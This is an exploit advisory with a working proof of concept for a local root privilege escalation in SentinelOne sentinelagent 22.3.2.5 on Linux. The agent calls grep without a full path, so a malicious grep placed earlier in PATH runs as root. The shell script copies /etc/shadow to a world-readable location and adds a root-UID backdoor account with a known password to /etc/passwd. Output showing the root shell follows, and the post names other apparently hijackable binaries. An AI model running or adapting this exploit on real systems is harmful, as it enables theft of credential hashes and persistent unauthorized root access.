SentinelOne sentinelagent 22.3.2.5 Privilege Escalation

SentinelOne sentinelagent version 22.3.2.5 on Linux suffers from a privilege escalation vulnerability due to not use a fully qualified path when calling grep.


SHA-256 | 7b1ea8d235bd30b17a490a855e3ffe72c96539d71206da6f0208b3ab0dee1a37

Exploit Title: SentinelOne sentinelagent (linux) root Privilege Escalation zero day vulnerability
Date: 12/06/2022
Exploit Author: ouch_this_hurts
Vendor Homepage: https://www.sentinelone.com/
Software Link: https://assets.sentinelone.com/prod/s1-linux-agent-datas
Version: 22.3.2.5
Tested on: Ubuntu 22.04.x
CVE: NA

Not enough AI in the world can help you write secure software it seems? The vendor doesnt make reporting vulnerabilities easy, so to exploit-db it goes :)

Protips:
- If I Google you, and I cannot find an easy way to report the vulnerability, I'm not going to bother.
- If you require me to use HackerOne, I'm not going to bother.
- If you dont have a security.txt, how do you expect me to contact you?

Get `root` on a system with `sentinelagent<=22.3.2.5` with one simple trick:

Override `grep` in the `PATH` with your malicious code. Reboot. pwnd. Nice!

PoC below:
1. Find the systems "earliest" `PATH`, or just override it to whatever you want in `/etc/environment` with some other staged exploit.
2. Create the following `grep` file in that directory and make sure its executable:

```shell
cat << SENTINELOOPS > /usr/local/bin/grep
#!/bin/bash
# I think I'll have the passwds pl0x
cat /etc/shadow > /tmp/etc_shadow

# password is password :)
echo 'sentinel_oops:\$1\$user1\$WuzQ29wbcMN09VLW7X0/q1:0:0::/root:/bin/sh' >> /etc/passwd
SENTINELOOPS

chmod +x /usr/local/bin/grep
```

3. Wait for machine to reboot, login as `sentinel_oops:password` :)

```
$ su sentinel_oops
Password:
# whoami
root
```

What actually happened here? On `sentinelagent` start it runs `sh -c "grep...."`.

So there are potentially other ways of privilege escalation via this "agent"?
- `grep` as demonstrated above
- `pgrep` examining the binary appears to be vulnerable
- `xargs` examining the binary appears to be vulnerable
- `cat` examining the binary appears to be vulnerable
- `pgrep` examining the binary appears to be vulnerable
- `ldd` examining the binary appears to be vulnerable
- `lsmod` examining the binary appears to be vulnerable
- `mksh` examining the binary appears to be vulnerable
- `awk` examining the binary appears to be vulnerable

[CWE-427](https://cwe.mitre.org/data/definitions/427.html) and [how to write secure software](https://youtu.be/RfiQYRn7fBg?t=16)

Related Posts